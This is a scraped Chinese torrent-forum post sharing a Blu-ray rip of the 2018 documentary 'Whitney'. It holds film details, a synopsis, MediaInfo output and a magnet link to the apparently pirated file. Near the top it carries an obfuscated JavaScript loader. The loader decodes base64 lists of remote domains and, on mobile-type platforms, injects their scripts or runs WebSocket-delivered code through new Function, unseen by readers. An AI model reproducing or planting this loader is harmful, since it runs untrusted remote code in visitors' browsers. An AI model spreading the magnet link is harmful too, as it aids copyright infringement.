惠特尼[简繁字幕]Whitney.2018.1080p.BluRay.x264.DTS-迅雷下载 10.31GB

版主小s 5天前 139

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 惠特尼 / 云妮侯斯顿:永恒的天后(港) / 永远爱你,惠妮!(台) / 惠特尼·休斯顿
◎片  名 Whitney
◎年  代 2018
◎产  地 英国 / 美国
◎类  别 纪录片 / 音乐 / 传记
◎语  言 英语
◎上映日期 2018-05-16(戛纳电影节) / 2018-07-06(英国)
◎IMDb链接 https://www.imdb.com/title/tt5740866/
◎豆瓣评分 7.8/10 (710人评价)
◎豆瓣链接 https://movie.douban.com/subject/26782382/
◎片  长 120分钟
◎导  演 凯文·麦克唐纳 Kevin Macdonald (id:1040757)
◎演  员 惠特尼·休斯顿 Whitney Houston (id:1022717)
       波比·克里斯蒂娜·布朗 Bobbi Kristina Brown (id:1235531)
       鲍比·布朗 Bobby Brown (id:1075814)
       茜茜·休斯顿 Cissy Houston (id:1095360)
       安东尼奥·里德 Antonio Reid (id:1169180)
       加里·哈斯顿 Gary Houston (id:1393934)
       克莱夫·戴维斯 Clive Davis (id:1056155)
       阿伦·雅各布斯 Alan Jacobs (id:1393936)
       玛丽·琼斯 Mary Jones (id:1393935)

◎标  签 纪录片 / 传记 / 音乐 / 2018 / 美国 / Whitney / 惠特尼 / 英国

◎简  介
  因《九月的某一天》获得奥斯卡最佳纪录长片的凯文·麦克唐纳,将与制片人西蒙·秦联合执导描绘惠特尼·休斯顿生平的纪录片。导演表示想通过纪录片把休斯顿生前经历完整展现,望观众走出影院时,想起休斯顿及她音乐上积极的东西,而不是过度关注她生前的负面事件,忘却其成就。

◎获奖情况 (共2项)
  第71届戛纳电影节 (2018)
  同志金棕榈奖(提名)
   └──凯文·麦克唐纳 (id:1040757)

  第39届伦敦影评人协会奖 (2019)
  年度纪录片(提名)

  1. General
  2. Unique ID                                : 248476362989446345562269871075260803230 (0xBAEECE8A245EAED5ACC348FFED3AA89E)
  3. Complete name                            : [email protected]
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 10.3 GiB
  7. Duration                                 : 2 h 1 min
  8. Overall bit rate                         : 12.2 Mb/s
  9. Encoded date                             : UTC 2021-07-19 04:14:27
  10. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit
  11. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  12. Video
  13. ID                                       : 1
  14. Format                                   : AVC
  15. Format/Info                              : Advanced Video Codec
  16. Format profile                           : [email protected]
  17. Format settings                          : CABAC / 4 Ref Frames
  18. Format settings, CABAC                   : Yes
  19. Format settings, Reference frames        : 4 frames
  20. Codec ID                                 : V_MPEG4/ISO/AVC
  21. Duration                                 : 2 h 1 min
  22. Bit rate                                 : 10.5 Mb/s
  23. Width                                    : 1 920 pixels
  24. Height                                   : 1 036 pixels
  25. Display aspect ratio                     : 1.85:1
  26. Frame rate mode                          : Constant
  27. Frame rate                               : 23.976 (24000/1001/53354) FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 8 bits
  31. Scan type                                : Progressive
  32. Bits/(Pixel*Frame)                       : 0.221
  33. Stream size                              : 8.92 GiB (87%)
  34. Writing library                          : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]
  35. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.5000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.90 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  36. Language                                 : English
  37. Default                                  : Yes
  38. Forced                                   : No
  39. Audio
  40. ID                                       : 2
  41. Format                                   : DTS
  42. Format/Info                              : Digital Theater Systems
  43. Codec ID                                 : A_DTS
  44. Duration                                 : 2 h 1 min
  45. Bit rate mode                            : Constant
  46. Bit rate                                 : 1 509 kb/s
  47. Channel(s)                               : 6 channels
  48. Channel layout                           : C L R Ls Rs LFE
  49. Sampling rate                            : 48.0 kHz
  50. Frame rate                               : 93.750 FPS (512 SPF)
  51. Bit depth                                : 24 bits
  52. Compression mode                         : Lossy
  53. Stream size                              : 1.28 GiB (12%)
  54. Language                                 : English
  55. Default                                  : Yes
  56. Forced                                   : No
  57. Text #1
  58. ID                                       : 3
  59. Format                                   : PGS
  60. Muxing mode                              : zlib
  61. Codec ID                                 : S_HDMV/PGS
  62. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  63. Duration                                 : 2 h 0 min
  64. Bit rate                                 : 67.8 kb/s
  65. Count of elements                        : 3890
  66. Stream size                              : 58.2 MiB (1%)
  67. Title                                    : 简英
  68. Language                                 : Chinese
  69. Default                                  : Yes
  70. Forced                                   : No
  71. Text #2
  72. ID                                       : 4
  73. Format                                   : PGS
  74. Muxing mode                              : zlib
  75. Codec ID                                 : S_HDMV/PGS
  76. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  77. Duration                                 : 2 h 0 min
  78. Bit rate                                 : 68.3 kb/s
  79. Count of elements                        : 3890
  80. Stream size                              : 58.6 MiB (1%)
  81. Title                                    : 繁英
  82. Language                                 : Chinese
  83. Default                                  : No
  84. Forced                                   : No
  85. Text #3
  86. ID                                       : 5
  87. Format                                   : PGS
  88. Muxing mode                              : zlib
  89. Codec ID                                 : S_HDMV/PGS
  90. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  91. Duration                                 : 2 h 0 min
  92. Bit rate                                 : 37.4 kb/s
  93. Count of elements                        : 3890
  94. Stream size                              : 32.1 MiB (0%)
  95. Title                                    : 简中
  96. Language                                 : Chinese
  97. Default                                  : No
  98. Forced                                   : No
  99. Text #4
  100. ID                                       : 6
  101. Format                                   : PGS
  102. Muxing mode                              : zlib
  103. Codec ID                                 : S_HDMV/PGS
  104. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  105. Duration                                 : 2 h 0 min
  106. Bit rate                                 : 37.9 kb/s
  107. Count of elements                        : 3890
  108. Stream size                              : 32.6 MiB (0%)
  109. Title                                    : 繁中
  110. Language                                 : Chinese
  111. Default                                  : No
  112. Forced                                   : No
  113. Text #5
  114. ID                                       : 7
  115. Format                                   : PGS
  116. Muxing mode                              : zlib
  117. Codec ID                                 : S_HDMV/PGS
  118. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  119. Duration                                 : 2 h 0 min
  120. Bit rate                                 : 51.7 kb/s
  121. Count of elements                        : 4490
  122. Stream size                              : 44.4 MiB (0%)
  123. Title                                    : 英语
  124. Language                                 : English
  125. Default                                  : No
  126. Forced                                   : No
  127. Menu
  128. 00:00:00.000                             : 第 01 章
  129. 00:05:36.836                             : 第 02 章
  130. 00:12:52.772                             : 第 03 章
  131. 00:20:03.202                             : 第 04 章
  132. 00:29:18.757                             : 第 05 章
  133. 00:38:10.288                             : 第 06 章
  134. 00:48:16.936                             : 第 07 章
  135. 00:59:50.587                             : 第 08 章
  136. 01:08:27.270                             : 第 09 章
  137. 01:17:05.621                             : 第 10 章
  138. 01:22:14.930                             : 第 11 章
  139. 01:30:40.435                             : 第 12 章
  140. 01:38:27.902                             : 第 13 章
  141. 01:45:27.321                             : 第 14 章
  142. 01:50:17.861                             : 第 15 章
  143. 01:55:46.940                             : 第 16 章
  144. 02:00:23.008                             : 第 17 章


TAGS 纪录片 传记 音乐

磁力链:
  • magnet:?xt=urn:btih:B7B827595178069751128C53A64B37252665B2DB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回